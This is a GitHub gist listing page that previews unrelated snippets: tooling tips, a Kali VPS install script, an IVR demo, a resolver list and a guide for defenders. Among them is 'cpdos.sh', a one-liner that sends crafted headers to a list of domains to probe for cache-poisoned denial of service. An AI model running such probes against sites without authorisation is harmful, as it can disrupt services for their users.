Skip to content

Instantly share code, notes, and snippets.

View ruevaughn's full-sized avatar

Chase Jensen ruevaughn

View GitHub Profile
@ChristopherA
ChristopherA / github-gh-tips.md
Last active December 27, 2022 15:34
GitHub & `gh` Tips

Github & gh Tips

Tips & advice related to GitHub specific features of git, gpg, and development.

@yezz123
yezz123 / Exploitation.md
Created May 24, 2021 12:09
Pentesting-Exploitation
@approovm
approovm / 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Last active April 18, 2025 18:03
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system
@RajChowdhury240
RajChowdhury240 / vps_install.sh
Created March 24, 2021 22:37
Quick script to install all the required tools over a VPS (tested on DEBIAN). It will install a Kali OS over the VPS and will install tools in a directory called "Tools". I run this script as "Root" and paths are hardcoded to "/root/Tools"
#!/bin/sh
systemctl enable ssh;
systemctl start ssh;
service ssh start;
apt-get install gpg-agent;
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list;
gpg --keyserver hkp://keys.gnupg.net --recv-key 7D8D0BF6;
gpg --fingerprint 7D8D0BF6;
gpg -a --export 7D8D0BF6 | apt-key add -;
@kun432
kun432 / index.js
Created March 20, 2021 13:58
IVR Demo for Voiceflow SDK integrated with Twilio Studio
'use strict';
const express = require('express');
const bodyParser = require('body-parser');
const { default: RuntimeClientFactory, TraceType } = require("@voiceflow/runtime-client-js");
const {randomBytes} = require('crypto')
function generateId(length) {
return randomBytes(length).reduce((p, i) => p + (i % 32).toString(32), '')
}
@DaWe35
DaWe35 / my_ubuntu_config.md
Last active January 28, 2022 09:52
Make my Ubuntu more awesome
@cyberheartmi9
cyberheartmi9 / cpdos.sh
Created February 18, 2021 21:09
Cache Poisoned Denial of Service
cat ~/domain.txt | httprobe | while read url;do ww=$(for i in "X-Oversized-Header-1: Big_Valuetestetstsetsetstsetestsetsetsetsetsetestsetsetsetsetsetsetsetsetsetesset" "X-Meta-Malicious-Header: \r\n" "X-HTTP-Method-Override: POST" "X-Forwarded-Port: 123" "X-Forwarded-Host: $url:123";do curl -s -L -I -H $i $url;done|grep HTTP|grep -v '301 '|awk '{ printf "%3d: %s\n", NR, $0 }');echo -e "\e[1;32m$url\e[0m""\n""$ww""\n";done
resolvers:
- 1.1.1.1
- 1.0.0.1
- 8.8.8.8
- 8.8.4.4
- 9.9.9.9
- 9.9.9.10
- 77.88.8.8
- 77.88.8.1
- 208.67.222.222
@Neo23x0
Neo23x0 / help.md
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.


Whenever you research a certain vulnerability ask yourself these questions and please answer them for us

Logging

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)

parse_user_options() {
local -r args=("${@}")
local opts
# The following code works perfectly for
opts=$(getopt --options a:,f,h --long abc:,help,flag -- "${args[@]}" 2> /dev/null) || {
usage
die "error: parsing options" "${error_parsing_options}"
}
eval set -- "${opts}"
while true; do